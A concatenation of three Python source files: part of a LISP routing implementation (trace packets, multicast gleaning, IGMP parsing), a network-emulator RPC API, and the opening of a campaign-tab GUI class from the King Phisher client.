"RTR" if lisp_i_am_rtr else "?"
srloc = packet.outer_source
if (srloc.is_null()): srloc = lisp_myrlocs[0]
entry["srloc"] = srloc.print_address_no_iid()
#
# In the source RLOC include the ephemeral port number of the ltr client
# so RTRs can return errors to the client behind a NAT.
#
if (entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT):
entry["srloc"] += ":{}".format(packet.inner_sport)
#endif
entry["hn"] = lisp_hostname
key = ed + "-ts"
entry[key] = lisp_get_timestamp()
#
# If this is a ETR decap entry and the drloc is "?", the packet came in on
# lisp_etr_nat_data_plane() where the kernel strips the outer header. Get
# the local/private RLOC from our database-mapping.
#
if (next_rloc == "?" and entry["node"] == "ETR"):
db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db != None and len(db.rloc_set) >= 1):
next_rloc = db.rloc_set[0].rloc.print_address_no_iid()
#endif
#endif
entry["drloc"] = next_rloc
#
# If there is a reason there is no dest RLOC, include it.
#
if (next_rloc == "?" and reason != None):
entry["drloc"] += " ({})".format(reason)
#endif
#
# Add recent-rtts, recent-hops, and recent-latencies.
#
if (rloc_entry != None):
entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
entry["hops"] = rloc_entry.recent_rloc_probe_hops
entry["latencies"] = rloc_entry.recent_rloc_probe_latencies
#endif
#
# Build seid->deid record if it does not exist. Then append node entry
# to record below, in the search loop.
#
seid = packet.inner_source.print_address()
deid = packet.inner_dest.print_address()
if (trace.packet_json == []):
rec = {}
rec["seid"] = seid
rec["deid"] = deid
rec["paths"] = []
trace.packet_json.append(rec)
#endif
#
# Search for record. If we appending the first ITR node entry, get its
# RLOC address in case we have to return-to-sender.
#
for rec in trace.packet_json:
if (rec["deid"] != deid): continue
rec["paths"].append(entry)
break
#endfor
#
# If we are destination-EID, add a new record deid->seid if we have not
# completed a round-trip. The ETR will deliver this packet from its own
# EID which means the co-located ITR will pcap the packet and add its
# encap node entry.
#
swap = False
if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
trace.myeid(packet.inner_dest)):
rec = {}
rec["seid"] = deid
rec["deid"] = seid
rec["paths"] = []
trace.packet_json.append(rec)
swap = True
#endif
#
# Print the JSON packet after we appended data to it. Put the new JSON in
# packet. Fix up lengths and checksums from inner headers.
#
trace.print_trace()
trace_pkt = trace.encode()
#
# If next_rloc is not known, we need to return packet to sender.
#
# Otherwise we are forwarding a packet that is about to encapsulated or we
# are forwarding a packet that was just decapsulated with the addresses
# swapped so we can turn it around.
#
sender_rloc = trace.packet_json[0]["paths"][0]["srloc"]
if (next_rloc == "?"):
lprint("LISP-Trace return to sender RLOC {}".format(sender_rloc))
trace.return_to_sender(lisp_socket, sender_rloc, trace_pkt)
return(False)
#endif
#
# Compute length of trace packet. This includes the UDP header, Trace
# header, and JSON payload.
#
udplen = trace.packet_length()
#
# Fix up UDP length and recompute UDP checksum if IPv6 packet, zero
# otherwise. Only do checksum when the Trace went round-trip and this is
# the local ETR delivery EID-based Trace packet to the client ltr.
#
headers = packet.packet[0:offset]
p = struct.pack("HH", socket.htons(udplen), 0)
headers = headers[0:offset-4] + p
if (packet.inner_version == 6 and entry["node"] == "ETR" and
len(trace.packet_json) == 2):
udp = headers[offset-8::] + trace_pkt
udp = lisp_udp_checksum(seid, deid, udp)
headers = headers[0:offset-8] + udp[0:8]
#endif
#
# If we are swampping addresses, do it here so the JSON append and IP
# header fields changes are all reflected in new IPv4 header checksum.
#
if (swap):
if (packet.inner_version == 4):
headers = headers[0:12] + headers[16:20] + headers[12:16] + \
headers[22:24] + headers[20:22] + headers[24::]
else:
headers = headers[0:8] + headers[24:40] + headers[8:24] + \
headers[42:44] + headers[40:42] + headers[44::]
#endif
d = packet.inner_dest
packet.inner_dest = packet.inner_source
packet.inner_source = d
#endif
#
# Fix up IP length.
#
offset = 2 if packet.inner_version == 4 else 4
iplen = 20 + udplen if packet.inner_version == 4 else udplen
h = struct.pack("H", socket.htons(iplen))
headers = headers[0:offset] + h + headers[offset+2::]
#
# Fix up IPv4 header checksum.
#
if (packet.inner_version == 4):
c = struct.pack("H", 0)
headers = headers[0:10] + c + headers[12::]
h = lisp_ip_checksum(headers[0:20])
headers = h + headers[20::]
#endif
#
# Caller is forwarding packet, either as an ITR, RTR, or ETR.
#
packet.packet = headers + trace_pkt
return(True)
#enddef
#
# lisp_allow_gleaning
#
# Check the lisp_glean_mapping array to see if we should glean the EID and
# RLOC. Find first match. Return False if there are no configured glean
# mappings. The second return value is either True or False depending if the
# matched entry was configured to RLOC-probe the RLOC for the gleaned entry.
#
def lisp_allow_gleaning(eid, group, rloc):
if (lisp_glean_mappings == []): return(False, False, False)
for entry in lisp_glean_mappings:
if (entry.has_key("instance-id")):
iid = eid.instance_id
low, high = entry["instance-id"]
if (iid < low or iid > high): continue
#endif
if (entry.has_key("eid-prefix")):
e = copy.deepcopy(entry["eid-prefix"])
e.instance_id = eid.instance_id
if (eid.is_more_specific(e) == False): continue
#endif
if (entry.has_key("group-prefix")):
if (group == None): continue
g = copy.deepcopy(entry["group-prefix"])
g.instance_id = group.instance_id
if (group.is_more_specific(g) == False): continue
#endif
if (entry.has_key("rloc-prefix")):
if (rloc != None and rloc.is_more_specific(entry["rloc-prefix"])
== False): continue
#endif
return(True, entry["rloc-probe"], entry["igmp-query"])
#endfor
return(False, False, False)
#enddef
#
# lisp_build_gleaned_multicast
#
# Build (*,G) map-cache entry in RTR with gleaned RLOC info from IGMP report.
#
def lisp_build_gleaned_multicast(seid, geid, rloc, port, igmp):
group_str = geid.print_address()
seid_name = seid.print_address_no_iid()
s = green("{}".format(seid_name), False)
e = green("(*, {})".format(group_str), False)
r = red(rloc.print_address_no_iid() + ":" + str(port), False)
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None):
mc = lisp_mapping("", "", [])
mc.group.copy_address(geid)
mc.eid.copy_address(geid)
mc.eid.address = 0
mc.eid.mask_len = 0
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_IGMP_TTL
mc.gleaned = True
mc.add_cache()
lprint("Add gleaned EID {} to map-cache".format(e))
#endif
#
# Check to see if RLE node exists. If so, update the RLE node RLOC and
# encap-port.
#
rloc_entry = rle_entry = rle_node = None
if (mc.rloc_set != []):
rloc_entry = mc.rloc_set[0]
if (rloc_entry.rle):
rle_entry = rloc_entry.rle
for rn in rle_entry.rle_nodes:
if (rn.rloc_name != seid_name): continue
rle_node = rn
break
#endfor
#endif
#endif
#
# Adding RLE to existing rloc-set or create new one.
#
if (rloc_entry == None):
rloc_entry = lisp_rloc()
mc.rloc_set = [rloc_entry]
rloc_entry.priority = 253
rloc_entry.mpriority = 255
mc.build_best_rloc_set()
#endif
if (rle_entry == None):
rle_entry = lisp_rle(geid.print_address())
rloc_entry.rle = rle_entry
#endif
if (rle_node == None):
rle_node = lisp_rle_node()
rle_node.rloc_name = seid_name
rle_entry.rle_nodes.append(rle_node)
rle_entry.build_forwarding_list()
lprint("Add RLE {} from {} for gleaned EID {}".format(r, s, e))
elif (rloc.is_exact_match(rle_node.address) == False or
port != rle_node.translated_port):
lprint("Changed RLE {} from {} for gleaned EID {}".format(r, s, e))
#endif
#
# Add or update.
#
rle_node.store_translated_rloc(rloc, port)
#
# An IGMP report was received. Update timestamp so we don't time out
# actively joined groups.
#
if (igmp):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False):
lisp_gleaned_groups[seid_str] = {}
#endif
lisp_gleaned_groups[seid_str][group_str] = lisp_get_timestamp()
#endif
#enddef
#
# lisp_remove_gleaned_multicast
#
# Remove an RLE from a gleaned entry since an IGMP Leave message was received.
#
def lisp_remove_gleaned_multicast(seid, geid):
#
# Support (*,G) only gleaning. Scales better anyway.
#
mc = lisp_map_cache_lookup(seid, geid)
if (mc == None): return
rle = mc.rloc_set[0].rle
if (rle == None): return
rloc_name = seid.print_address_no_iid()
found = False
for rle_node in rle.rle_nodes:
if (rle_node.rloc_name == rloc_name):
found = True
break
#endif
#endfor
if (found == False): return
#
# Found entry to remove.
#
rle.rle_nodes.remove(rle_node)
rle.build_forwarding_list()
group_str = geid.print_address()
seid_str = seid.print_address()
s = green("{}".format(seid_str), False)
e = green("(*, {})".format(group_str), False)
lprint("Gleaned EID {} RLE removed for {}".format(e, s))
#
# Remove that EID has joined the group.
#
if (lisp_gleaned_groups.has_key(seid_str)):
if (lisp_gleaned_groups[seid_str].has_key(group_str)):
lisp_gleaned_groups[seid_str].pop(group_str)
#endif
#endif
#
# Remove map-cache entry if no more RLEs present.
#
if (rle.rle_nodes == []):
mc.delete_cache()
lprint("Gleaned EID {} remove, no more RLEs".format(e))
#endif
#enddef
#
# lisp_change_gleaned_multicast
#
# Change RLOC for each gleaned group this EID has joined.
#
def lisp_change_gleaned_multicast(seid, rloc, port):
seid_str = seid.print_address()
if (lisp_gleaned_groups.has_key(seid_str) == False): return
for group in lisp_gleaned_groups[seid_str]:
lisp_geid.store_address(group)
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, port, False)
#endfor
#enddef
#
# lisp_process_igmp_packet
#
# Process IGMP packets.
#
# Basically odd types are Joins and even types are Leaves.
#
#
# An IGMPv1 and IGMPv2 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Version| Type | Unused | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Group Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 report format is:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 0x22 | Reserved | Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | Number of Group Records (M) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [1] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [2] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . |
# . . .
# | . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Group Record [M] .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# An IGMPv3 group record format is:
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record Type | Aux Data Len | Number of Sources (N) |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Multicast Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Source Address [1] |
# +- -+
# | Source Address [2] |
# +- -+
# . . .
# . . .
# . . .
# +- -+
# | Source Address [N] |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | |
# . .
# . Auxiliary Data .
# . .
# | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
#
# The function returns a boolean (True) when packet is an IGMP query and
# an array when it is a report. Caller must check where there is context
# to deal with IGMP queries.
#
# IMPORTANT NOTE: for encapsulated IGMP Queries to be forwarded correctly
# after the ETR decapsulates them, you need this in the kernel (put this
# statement in the RL script):
#
# ip route add 224.0.0.1/32 dev lo
#
# For OOR runnnig as a LISP-MN use:
#
# ip route add 224.0.0.1/32 dev utun4
#
igmp_types = { 17 : "IGMP-query", 18 : "IGMPv1-report", 19 : "DVMRP",
20 : "PIMv1", 22 : "IGMPv2-report", 23 : "IGMPv2-leave",
30 : "mtrace-response", 31 : "mtrace-request", 34 : "IGMPv3-report" }
lisp_igmp_record_types = { 1 : "include-mode", 2 : "exclude-mode",
3 : "change-to-include", 4 : "change-to-exclude", 5 : "allow-new-source",
6 : "block-old-sources" }
def lisp_process_igmp_packet(packet):
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
source = bold("from {}".format(source.print_address_no_iid()), False)
r = bold("Receive", False)
lprint("{} {}-byte {}, IGMP packet: {}".format(r, len(packet), source,
lisp_format_packet(packet)))
#
# Jump over IP header.
#
header_offset = (struct.unpack("B", packet[0])[0] & 0x0f) * 4
#
# Check for IGMPv3 type value 0x22. Or process an IGMPv2 report.
#
igmp = packet[header_offset::]
igmp_type = struct.unpack("B", igmp[0])[0]
#
# Maybe this is an IGMPv1 or IGMPv2 message so get group address. If
# IGMPv3, we will fix up group address in loop (for each group record).
#
group = lisp_address(LISP_AFI_IPV4, "", 32, 0)
group.address = socket.ntohl(struct.unpack("II", igmp[:8])[1])
group_str = group.print_address_no_iid()
if (igmp_type == 17):
lprint("IGMP Query for group {}".format(group_str))
return(True)
#endif
reports_and_leaves_only = (igmp_type in (0x12, 0x16, 0x17, 0x22))
if (reports_and_leaves_only == False):
igmp_str = "{} ({})".format(igmp_type, igmp_types[igmp_type]) if \
igmp_types.has_key(igmp_type) else igmp_type
lprint("IGMP type {} not supported".format(igmp_str))
return([])
#endif
if (len(igmp) < 8):
lprint("IGMP message too small")
return([])
#endif
#
# Process either IGMPv1 or IGMPv2 and exit.
#
if (igmp_type == 0x17):
lprint("IGMPv2 leave (*, {})".format(bold(group_str, False)))
return([[None, group_str, False]])
#endif
if (igmp_type in (0x12, 0x16)):
lprint("IGMPv{} join (*, {})".format( \
1 if (igmp_type == 0x12) else 2, bold(group_str, False)))
#
# Suppress for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
else:
return([[None, group_str, True]])
#endif
#
# Finished with IGMPv1 or IGMPv2 processing.
#
return([])
#endif
#
# Parse each record for IGMPv3 (igmp_type == 0x22).
#
record_count = group.address
igmp = igmp[8::]
group_format = "BBHI"
group_size = struct.calcsize(group_format)
source_format = "I"
source_size = struct.calcsize(source_format)
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
#
# Traverse each group record.
#
register_entries = []
for i in range(record_count):
if (len(igmp) < group_size): return
record_type, x, source_count, address = struct.unpack(group_format,
igmp[:group_size])
igmp = igmp[group_size::]
if (lisp_igmp_record_types.has_key(record_type) == False):
lprint("Invalid record type {}".format(record_type))
continue
#endif
record_type_str = lisp_igmp_record_types[record_type]
source_count = socket.ntohs(source_count)
group.address = socket.ntohl(address)
group_str = group.print_address_no_iid()
lprint("Record type: {}, group: {}, source-count: {}".format( \
record_type_str, group_str, source_count))
#
# Determine if this is a join or leave. MODE_IS_INCLUDE (1) is a join.
# MODE_TO_EXCLUDE (4) with no sources is a join. CHANGE_TO_INCLUDE (5)
# is a join. Everything else is a leave.
#
joinleave = False
if (record_type in (1, 5)): joinleave = True
if (record_type in (2, 4) and source_count == 0): joinleave = True
j_or_l = "join" if (joinleave) else "leave"
#
# Suppress registration for link-local groups.
#
if (group_str.find("224.0.0.") != -1):
lprint("Suppress registration for link-local groups")
continue
#endif
#
# (*,G) Join or Leave has been received if source count is 0.
#
# If this is IGMPv2 or just IGMPv3 reporting a group address, encode
# a (*,G) for the element in the register_entries array.
#
if (source_count == 0):
register_entries.append([None, group_str, joinleave])
lprint("IGMPv3 {} (*, {})".format(bold(j_or_l, False),
bold(group_str, False)))
#endif
#
# Process (S,G)s (source records)..
#
for j in range(source_count):
if (len(igmp) < source_size): return
address = struct.unpack(source_format, igmp[:source_size])[0]
source.address = socket.ntohl(address)
source_str = source.print_address_no_iid()
register_entries.append([source_str, group_str, joinleave])
lprint("{} ({}, {})".format(j_or_l,
green(source_str, False), bold(group_str, False)))
igmp = igmp[source_size::]
#endfor
#endfor
#
# Return (S,G) entries to return to call to send a Map-Register.
# They are put in a multicast Info LCAF Type with ourselves as an RLE.
# This is spec'ed in RFC 8378.
#
return(register_entries)
#enddef
#
# lisp_glean_map_cache
#
# Add or update a gleaned EID/RLOC to the map-cache. This function will do
# this for the source EID of a packet and IGMP reported groups with one call.
#
lisp_geid = lisp_address(LISP_AFI_IPV4, "", 32, 0)
def lisp_glean_map_cache(seid, rloc, encap_port, igmp):
#
# First do lookup to see if EID is in map-cache. Check to see if RLOC
# or encap-port needs updating. If not, return. Set refresh timer since
# we received a packet from the source gleaned EID.
#
rloc_change = True
mc = lisp_map_cache.lookup_cache(seid, True)
if (mc and len(mc.rloc_set) != 0):
mc.last_refresh_time = lisp_get_timestamp()
cached_rloc = mc.rloc_set[0]
orloc = cached_rloc.rloc
oport = cached_rloc.translated_port
rloc_change = (orloc.is_exact_match(rloc) == False or
oport != encap_port)
if (rloc_change):
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Change gleaned EID {} to RLOC {}".format(e, r))
cached_rloc.delete_from_rloc_probe_list(mc.eid, mc.group)
lisp_change_gleaned_multicast(seid, rloc, encap_port)
#endif
else:
mc = lisp_mapping("", "", [])
mc.eid.copy_address(seid)
mc.mapping_source.copy_address(rloc)
mc.map_cache_ttl = LISP_GLEAN_TTL
mc.gleaned = True
e = green(seid.print_address(), False)
r = red(rloc.print_address_no_iid() + ":" + str(encap_port), False)
lprint("Add gleaned EID {} to map-cache with RLOC {}".format(e, r))
mc.add_cache()
#endif
#
# Adding RLOC to new map-cache entry or updating RLOC for existing entry..
#
if (rloc_change):
rloc_entry = lisp_rloc()
rloc_entry.store_translated_rloc(rloc, encap_port)
rloc_entry.add_to_rloc_probe_list(mc.eid, mc.group)
rloc_entry.priority = 253
rloc_entry.mpriority = 255
rloc_set = [rloc_entry]
mc.rloc_set = rloc_set
mc.build_best_rloc_set()
#endif
#
# Unicast gleaning only.
#
if (igmp == None): return
#
# Process IGMP report. For each group, put in map-cache with gleaned
# source RLOC and source port.
#
lisp_geid.instance_id = seid.instance_id
#
# Add (S,G) or (*,G) to map-cache. Do not do lookup in group-mappings.
# The lisp-etr process will do this.
#
entries = lisp_process_igmp_packet(igmp)
if (type(entries) == bool): return
for source, group, joinleave in entries:
if (source != None): continue
#
# Does policy allow gleaning for this joined multicast group.
#
lisp_geid.store_address(group)
allow, x, y = lisp_allow_gleaning(seid, lisp_geid, rloc)
if (allow == False): continue
if (joinleave):
lisp_build_gleaned_multicast(seid, lisp_geid, rloc, encap_port,
True)
else:
lisp_remove_gleaned_multicast(seid, lisp_geid)
#endif
#endfor
#enddef
#
# lisp_is_json_telemetry
#
# Return dictionary arraay if json string has the following two key/value
# pairs in it. Otherwise, return None.
#
# { "type" : "telemetry", "sub-type" : "timestamps" }
#
def lisp_is_json_telemetry(json_string):
try:
tel = json.loads(json_string)
if (type(tel) != dict): return(None)
except:
lprint("Could not decode telemetry json: {}".format(json_string))
return(None)
#endtry
if (tel.has_key("type") == False): return(None)
if (tel.has_key("sub-type") == False): return(None)
if (tel["type"] != "telemetry"): return(None)
if (tel["sub-type"] != "timestamps"): return(None)
return(tel)
#enddef
#
# lisp_encode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And fill in timestamps for the 4 fields. Input to this function is a string.
#
def lisp_encode_telemetry(json_string, ii="?", io="?", ei="?", eo="?"):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return(json_string)
if (tel["itr-in"] == "?"): tel["itr-in"] = ii
if (tel["itr-out"] == "?"): tel["itr-out"] = io
if (tel["etr-in"] == "?"): tel["etr-in"] = ei
if (tel["etr-out"] == "?"): tel["etr-out"] = eo
json_string = json.dumps(tel)
return(json_string)
#enddef
#
# lisp_decode_telemetry
#
# Take json string:
#
# { "type" : "telemetry", "sub-type" : "timestamps", "itr-out" : "?",
# "etr-in" : "?", "etr-out" : "?", "itr-in" : "?" }
#
# And return values in a dictionary array. Input to this function is a string.
#
def lisp_decode_telemetry(json_string):
tel = lisp_is_json_telemetry(json_string)
if (tel == None): return({})
return(tel)
#enddef
#
# lisp_telemetry_configured
#
# Return JSON string template of telemetry data if it has been configured.
# If it has been configured we'll find a "lisp json" command with json-name
# "telemetry". If found, return the json string. Otherwise, return None.
#
def lisp_telemetry_configured():
if (lisp_json_list.has_key("telemetry") == False): return(None)
json_string = lisp_json_list["telemetry"].json_string
if (lisp_is_json_telemetry(json_string) == None): return(None)
return(json_string)
#enddef
#------------------------------------------------------------------------------
|
network.py
|
"""
Copyright (c) 2015 SONATA-NFV
ALL RIGHTS RESERVED.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Neither the name of the SONATA-NFV [, ANY ADDITIONAL AFFILIATION]
nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written
permission.
This work has been performed in the framework of the SONATA project,
funded by the European Commission under Grant number 671517 through
the Horizon 2020 and 5G-PPP programmes. The authors would like to
acknowledge the contributions of their colleagues of the SONATA
partner consortium (www.sonata-nfv.eu).
"""
"""
Distributed Cloud Emulator (dcemulator)
Networking and monitoring functions
(c) 2015 by Steven Van Rossem <steven.vanrossem@intec.ugent.be>
"""
import logging
import threading
import zerorpc
logging.basicConfig(level=logging.INFO)
class ZeroRpcApiEndpointDCNetwork(object):
"""
Simple API endpoint that offers a zerorpc-based
interface. This interface will be used by the
default command line client.
It can be used as a reference to implement
REST interfaces providing the same semantics,
like e.g. OpenStack compute API.
"""
def __init__(self, listenip, port, DCNetwork=None):
if DCNetwork :
self.connectDCNetwork(DCNetwork)
self.ip = listenip
self.port = port
logging.debug("Created monitoring API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def connectDCNetwork(self, net):
self.net = net
logging.info("Connected DCNetwork to API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def start(self):
thread = threading.Thread(target=self._api_server_thread, args=())
thread.daemon = True
thread.start()
logging.debug("Started API endpoint %s(%s:%d)" % (
self.__class__.__name__, self.ip, self.port))
def _api_server_thread(self):
s = zerorpc.Server(DCNetworkApi(self.net))
s.bind("tcp://%s:%d" % (self.ip, self.port))
s.run()
def stop(self):
logging.info("Stop the monitoring API endpoint")
return
class DCNetworkApi(object):
"""
The networking and monitoring commands need the scope of the
whole DC network to find the requested vnf. So this API is intended
to work with a DCNetwork.
Just pass through the corresponding request to the
selected data center network. Do not implement provisioning
logic here because will will have multiple API
endpoint implementations at the end.
"""
def __init__(self, net):
self.net = net
def network_action_start(self, vnf_src_name, vnf_dst_name, kwargs):
# call DCNetwork method, not really datacenter specific API for now...
# provided dc name needs to be part of API endpoint
# no check if vnfs are really connected to this datacenter...
logging.debug("RPC CALL: network chain start")
try:
c = self.net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=kwargs.get('vnf_src_interface'),
vnf_dst_interface=kwargs.get('vnf_dst_interface'),
cmd='add-flow',
weight=kwargs.get('weight'),
match=kwargs.get('match'),
bidirectional=kwargs.get('bidirectional'),
cookie=kwargs.get('cookie'))
return str(c)
except Exception as ex:
logging.exception("RPC error.")
return ex.message
def network_action_stop(self, vnf_src_name, vnf_dst_name, kwargs):
# call DCNetwork method, not really datacenter specific API for now...
# provided dc name needs to be part of API endpoint
# no check if vnfs are really connected to this datacenter...
logging.debug("RPC CALL: network chain stop")
try:
c = self.net.setChain(
vnf_src_name, vnf_dst_name,
vnf_src_interface=kwargs.get('vnf_src_interface'),
vnf_dst_interface=kwargs.get('vnf_dst_interface'),
cmd='del-flows',
weight=kwargs.get('weight'),
match=kwargs.get('match'),
bidirectional=kwargs.get('bidirectional'),
cookie=kwargs.get('cookie'))
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# setup the rate measurement for a vnf interface
def setup_metric(self, vnf_name, vnf_interface, metric):
logging.debug("RPC CALL: setup metric")
try:
c = self.net.monitor_agent.setup_metric(vnf_name, vnf_interface, metric)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# remove the rate measurement for a vnf interface
def stop_metric(self, vnf_name, vnf_interface, metric):
logging.debug("RPC CALL: stop metric")
try:
c = self.net.monitor_agent.stop_metric(vnf_name, vnf_interface, metric)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# setup the flow metrics measurement
def setup_flow(self, vnf_name, vnf_interface, metric, cookie):
logging.debug("RPC CALL: setup flow")
try:
c = self.net.monitor_agent.setup_flow(vnf_name, vnf_interface, metric, cookie)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# remove the flow metrics measurement
def stop_flow(self, vnf_name, vnf_interface, metric, cookie):
logging.debug("RPC CALL: stop flow")
try:
c = self.net.monitor_agent.stop_flow(vnf_name, vnf_interface, metric, cookie)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
# do prometheus query
def prometheus(self, dc_label, vnf_name, vnf_interface, query):
logging.debug("RPC CALL: query prometheus")
vnf_status = self.net.dcs.get(dc_label).containers.get(vnf_name).getStatus()
uuid = vnf_status['id']
query = query.replace('<uuid>', uuid)
#if needed, replace interface id with emu-intfs name
# query = query.replace('<intf>', vnf_interface)
logging.info('query: {0}'.format(query))
try:
c = self.net.monitor_agent.query_Prometheus(query)
return c
except Exception as ex:
logging.exception("RPC error.")
return ex.message
|
campaign.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# king_phisher/client/tabs/campaign.py
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the project nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
import datetime
import logging
import threading
import time
from king_phisher import utilities
from king_phisher.client import export
from king_phisher.client import graphs
from king_phisher.client import gui_utilities
from gi.repository import Gdk
from gi.repository import GLib
from gi.repository import Gtk
class CampaignViewGenericTab(gui_utilities.UtilityGladeGObject):
"""
This object is meant to be subclassed by all of the tabs which load and
display information about the current campaign.
"""
label_text = 'Unknown'
"""The label of the tab for display in the GUI."""
top_gobject = 'box'
def __init__(self, *args, **kwargs):
self.label = Gtk.Label(label=self.label_text)
"""The :py:class:`Gtk.Label` representing this tab with text from :py:attr:`~.CampaignViewGenericTab.label_text`."""
super(CampaignViewGenericTab, self).__init__(*args, **kwargs)
self.is_destroyed = threading.Event()
getattr(self, self.top_gobject).connect('destroy', self.signal_destroy)
self.last_load_time = float('-inf')
"""The last time the data was loaded from the server."""
self.refresh_frequency = utilities.timedef_to_seconds(str(self.config.get('gui.refresh_frequency', '5m')))
"""The lifetime in seconds to wait before refreshing the data from the server."""
self.loader_thread = None
"""The thread object which loads the data from the server."""
self.loader_thread_lock = threading.Lock()
"""The :py:class:`threading.Lock` object used for synchronization between the loader and main threads."""
def load_campaign_information(self, force=False):
raise NotImplementedError()
def signal_button_clicked_refresh(self, button):
self.load_campaign_information(force=True)
def signal_destroy(self, gobject):
self.is_destroyed.set()
if isinstance(self.loader_thread, threading.Thread) and self.loader_thread.is_alive():
self.logger.debug("waiting on thread: {0}.loader_thread (tid: 0x{1:x})".format(self.__class__.__name__, self.loader_thread.ident))
while self.loader_thread.is_alive():
gui_utilities.gtk_sync()
